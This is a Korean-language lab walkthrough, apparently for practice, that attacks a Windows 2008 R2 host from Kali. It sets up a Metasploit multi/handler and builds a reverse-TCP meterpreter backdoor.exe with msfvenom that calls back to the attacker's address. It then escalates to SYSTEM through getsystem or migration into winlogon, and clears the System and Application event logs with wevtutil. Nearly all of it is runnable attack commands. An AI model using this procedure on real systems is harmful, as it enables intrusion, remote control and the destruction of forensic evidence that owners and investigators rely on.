meterpreter을 이용한 Windows 2008 R2의 로그 삭제

*윈도우 2008 로그 삭제
 Attacker : Kali
 Victim    : Windows 2008 R2
 사전에 Widows 2008 R2에 침입이 가능하다는 전제가 필요하다.
 
*실습
 (kali)
 #cd /root/bin
 #vi reverse_resource2.rc
 use exploit/multi/handler
 set PAYLOAD windows/x64/meterpreter/reverse_tcp
 set LHOST 192.168.20.50
 set ExitSession false
 exploit -j -z
※msfconsole의 -r옵션인 리소스로 사용하기위해 사전 생성 
 #msfconsole -r reverse_resource2.rc (해당 터미널은 있고 새로운 터미널로 진행)

 #msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.92.50 LPORT=4444 -f exe > backdoor.exe

 ※해당 backdoor.exe을 window 2008 R2에 심어놓고 실행을 시켜야함
 
 (windows 2008)
 backdoor.exe 실행을 수동으로 실행시키고 로그기록 확인
 시작 > 관리도구 > 이벤트 뷰어 > Windows 로그 > 로그기록 확인한다.

 (kali)
 window 2008과 세션이 연결된걸 확인
 msf > sessions

 msf > sessions -i 1
 meterpreter > getuid

 meterpreter > getsystem -h
 meterpreter > getsystem
 meterpreter > getuid (system이라는 최고 권한을 얻어짐)

 or
 meterpreter > shell
 c: > wmic process list brief | find "winlogon"
 c: > exit
 meterpreter > migrate 488
 meterpreter > getuid

 meterpreter > shell
 c: > wevtutil.exe el (로그에 대한 목록)
 c: > wevtutil.exe cl "System" (시스템 로그 삭제)
 c: > wevtutil.exe cl "Application" (응용프로그램 로그 삭제)
 ※원하는 부분의 로그를 지우면 된다.
 
 (windows 2008)
 시작 > 제어판 > 관리도구 > 이벤트 뷰어 > Windows 로그 > 로그부분을 확인한다.